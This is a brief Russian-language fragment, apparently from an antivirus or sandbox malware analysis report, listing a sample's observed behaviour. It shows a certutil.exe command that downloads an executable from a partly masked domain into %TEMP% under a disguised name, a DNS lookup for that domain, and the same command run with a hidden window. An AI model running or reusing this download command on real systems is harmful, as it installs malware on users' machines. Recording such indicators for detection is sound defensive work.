Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://ko###afager.com/tue/mon.exe %TEMP%\\\systaskk.exe
- DNS ASK ko###afager.com
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://ko###afager.com/tue/mon.exe %TEMP%\\\systaskk.exe' (со скрытым окном)